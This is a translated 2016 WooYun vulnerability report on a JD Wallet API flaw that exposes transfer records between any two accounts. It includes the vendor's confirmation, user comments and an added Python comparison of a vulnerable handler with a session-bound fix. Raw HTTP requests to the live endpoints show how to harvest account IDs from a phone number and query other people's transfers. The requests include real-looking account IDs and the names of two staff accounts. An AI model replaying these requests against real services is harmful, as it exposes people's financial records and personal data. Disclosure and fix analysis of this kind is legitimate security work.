
Vulnerability summary

Defect ID: wooyun-2016-0168304

Title: JD Wallet unauthorized query: viewing the transfer records between any two accounts

Vendor: JD Finance (京东金融)

Author: 骑虎打狗

Submitted: 2016-01-08 10:48

Fixed: 2016-02-22 16:48

Published: 2016-02-22 16:48

Vulnerability type: Design flaw / logic error

Severity: High

Self-assessed Rank: 16

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2016-01-08: Details sent to the vendor, awaiting vendor handling
2016-01-08: Vendor confirmed; details disclosed to the vendor only
2016-01-18: Details disclosed to core white hats and domain experts
2016-01-28: Details disclosed to regular white hats
2016-02-07: Details disclosed to intern white hats
2016-02-22: Details disclosed to the public

Brief description:

JD Wallet unauthorized query: the transfer records between any two accounts can be viewed. And I stress: any two accounts!!

Detailed description:

1. When the client queries the transfer records between two accounts, the packet captured with Fiddler looks like this (side note: is it really unimportant that the HTTPS SSL certificate check can be trivially bypassed? Internally it was simply ignored... so here I am at WooYun):

POST https://m.wangyin.com/ryze/transferRecord HTTP/1.1
Content-Type: application/json; charset=UTF-8
Content-Length: 309
Host: m.wangyin.com
Connection: Close
User-Agent: android
Accept-Encoding: gzip
{"desCustomerId":"360000000041109552","pageNum":1,"pageSize":10,"channel":"xiaomi","clientVersion":"4.1.0","customerId":"360000000215219468","macAddress":"14-f6-5a-d1-47-0f","auth":"f9957871d0a24d108e62015942f4d5b5","userId":"1200006529071","clientName":"android","deviceId":"866001023475214","version":"2.0"}


Notice anything? Right: there is no Cookie, Key, Salt or anything of the sort. So I trimmed the packet down as follows, and the request still returned results normally:

POST https://m.wangyin.com/ryze/transferRecord HTTP/1.1
Content-Type: application/json; charset=UTF-8
Content-Length: 309
Host: m.wangyin.com
Connection: Close
User-Agent: android
Accept-Encoding: gzip
{"desCustomerId":"360000000041109552","pageNum":1,"pageSize":10,"channel":"","clientVersion":"","customerId":"360000000215219468","macAddress":"","auth":"","userId":"1200006529071","clientName":"","deviceId":"","version":""}


So only three pieces of information (desCustomerId, customerId and userId) are needed to query the transfer records between two accounts, as shown in the figure below:

15.png


So the question is: knowing only a phone number, how do you obtain the two IDs of an arbitrary account? (Whatever the policy behind it, an account has a userID and a second ID..) I adjusted my glasses and recalled a detail: when making a transfer, doesn't the app verify the recipient account first? Let's see whether that step returns the verified account's two IDs. Sure enough, it does. The trimmed request packet is:

POST https://m.wangyin.com/ryze/transferStatus HTTP/1.1
Content-Type: application/json; charset=UTF-8
Content-Length: 301
Host: m.wangyin.com
Connection: Close
User-Agent: android
Accept-Encoding: gzip
{"desCustomerName":"u7RNVmqGzNrHVgn/vI/UpQ\u003d\u003d","channel":"","clientVersion":"","customerId":"360000000253312977","macAddress":"","auth":"f15d43c3986293cfc3885121ad2204e3","userId":"1200010338038","clientName":"","deviceId":"","version":""}


The phone number is encrypted, but that doesn't matter as long as the request goes through. It successfully returned the verified account's two IDs:

{"resultCode":0,"resultMsg":null,"resultData":{"validUser":true,"realNameUser":true,"desUserName":"*笑","accountName":"186****5417","historyTransfer":false,"desHeadIconUrl":"http://img20.360buyimg.com/payment/jfs/t1237/176/1060321396/24129/3671b827/557062baN2458bbda.png","inUserId":"1200006529071","inCustomerId":"360000000215219468"}}


With that, we can obtain any account's two IDs, and therefore the transfer records between any two accounts.
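The root cause described above is that the transferRecord endpoint takes the querying party's identity from the JSON body, and the transferStatus endpoint hands out the internal IDs of any account looked up by phone number. The following is an added illustration written for this page, not JD Wallet's code: a vulnerable handler that mirrors the reported behaviour next to a hardened version that resolves the caller from a server-side session and never returns internal IDs to the client. Session tokens, customer IDs, phone numbers, names and the ledger are all constructed placeholders; the session store, the `desPhone` field and the `recipientToken` mechanism are assumptions made for the example.

```python
import secrets

# Constructed sample data; IDs, phone numbers and names are placeholders,
# not values from the report.
SESSIONS = {                       # session token -> (userId, customerId), set at login
    "sess-a1": ("U-1001", "C-1001"),
    "sess-b2": ("U-1002", "C-1002"),
}
ACCOUNTS = {                       # phone number -> account, as the status lookup sees it
    "18600005417": {"userId": "U-1002", "customerId": "C-1002", "name": "王笑"},
}
TRANSFERS = [                      # (from customerId, to customerId, amount)
    ("C-1001", "C-1002", 50.0),
    ("C-1002", "C-1001", 20.0),
    ("C-1003", "C-1002", 99.0),    # a third party's transfer: never visible to C-1001
]
RECIPIENT_TOKENS = {}              # opaque token -> (issuing session, recipient customerId)


def _records_between(a, b):
    """All ledger entries in which exactly the customers a and b are the two parties."""
    return [t for t in TRANSFERS if {t[0], t[1]} == {a, b}]


def transfer_record_vulnerable(body):
    """Mirrors the reported flaw: the caller names both parties in the JSON body and
    nothing ties customerId to whoever actually sent the request."""
    return {"resultCode": 0,
            "resultData": _records_between(body["customerId"], body["desCustomerId"])}


def transfer_record_fixed(body, session_token):
    """Hardened handler: the querying party comes from the server-side session, so a
    caller can only ever see transfers they are themselves a party to."""
    session = SESSIONS.get(session_token)
    if session is None:
        return {"resultCode": 401, "resultMsg": "not authenticated", "resultData": None}
    _, my_customer_id = session
    # A customerId in the body is tolerated for compatibility but must match the session.
    if body.get("customerId") not in (None, "", my_customer_id):
        return {"resultCode": 403, "resultMsg": "customerId does not match session",
                "resultData": None}
    return {"resultCode": 0, "resultMsg": None,
            "resultData": _records_between(my_customer_id, body["desCustomerId"])}


def _mask_phone(phone):
    return phone[:3] + "****" + phone[-4:]


def transfer_status_fixed(body, session_token):
    """Hardened recipient check: confirms the account exists and returns display data
    only. Internal IDs stay server-side; the client gets an opaque token bound to the
    requesting session instead of inUserId / inCustomerId."""
    if session_token not in SESSIONS:
        return {"resultCode": 401, "resultMsg": "not authenticated", "resultData": None}
    acct = ACCOUNTS.get(body["desPhone"])
    if acct is None:
        return {"resultCode": 0, "resultMsg": None, "resultData": {"validUser": False}}
    token = secrets.token_urlsafe(16)
    RECIPIENT_TOKENS[token] = (session_token, acct["customerId"])
    return {"resultCode": 0, "resultMsg": None, "resultData": {
        "validUser": True,
        "desUserName": "*" + acct["name"][-1],          # given name only, surname masked
        "accountName": _mask_phone(body["desPhone"]),
        "recipientToken": token,
    }}


def resolve_recipient(token, session_token):
    """Server-side lookup used by the transfer step: a token is only valid for the
    session that obtained it, so a harvested token is useless elsewhere."""
    issuer, customer_id = RECIPIENT_TOKENS.get(token, (None, None))
    return customer_id if issuer == session_token else None


if __name__ == "__main__":
    # The flaw: a caller who is neither party can read C-1003's transfer.
    print(transfer_record_vulnerable({"customerId": "C-1003", "desCustomerId": "C-1002"}))
    # The fix: the same body from session sess-a1 (customer C-1001) is refused.
    print(transfer_record_fixed({"customerId": "C-1003", "desCustomerId": "C-1002"}, "sess-a1"))
    print(transfer_status_fixed({"desPhone": "18600005417"}, "sess-a1"))
```

The two checks that matter are that the hardened record query ignores any identity claim in the body in favour of the session, and that the recipient check no longer returns anything a caller could reuse as another account's identity. Stripping the empty `channel`, `auth` and `deviceId` fields from the request, as the report did, would change nothing here because none of them was ever part of the authorization decision.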

Proof of vulnerability:

Below I test pairwise transfer records using internal accounts I obtained a few days ago:

16.png


The two IDs of 刑同举:

17.png


The two IDs of 岳棱辉:

18.png


Taking 刑同举 as the subject, we look at his transfer records with 岳棱辉. Construct the POST request:

POST https://m.wangyin.com/ryze/transferRecord HTTP/1.1
Content-Type: application/json; charset=UTF-8
Content-Length: 224
Host: m.wangyin.com
Connection: Close
User-Agent: android
Accept-Encoding: gzip
{"desCustomerId":"360000000064845496","pageNum":1,"pageSize":10,"channel":"","clientVersion":"","customerId":"360000000051318036","macAddress":"","auth":"","userId":"1000000003607","clientName":"","deviceId":"","version":""}


Request result:

19.png


No need to say more!

Fix recommendation:

"Right: there is no Cookie, Key, Salt or anything of the sort."

Copyright notice: please credit the source when reposting: 骑虎打狗@乌云


Vendor response

Vendor response:

Severity: Medium

Vulnerability Rank: 5

Confirmed at: 2016-01-08 18:35

Vendor reply:

Thank you for your attention to JD Finance security!

Latest status:

None yet


Comments:

  1. 2016-01-08 11:33 | 瘦蛟舞 Certified white hat ( Regular white hat | Rank:765 Vulnerabilities:83 | The iron armour still stands)

    Heh, keep going, keep going~

  2. 2016-01-08 11:39 | 海琪花 ( Passerby | Rank:0 Vulnerabilities:1 | Selling seafood... if you're not buying, don't bother me)

    jd

  3. 2016-01-08 12:57 | 牛 小 帅 ( Regular white hat | Rank:1031 Vulnerabilities:247 | 1. The most handsome man on WooYun ...)

    Your handle isn't well chosen; it should be 骑狗大虎, that would have more punch.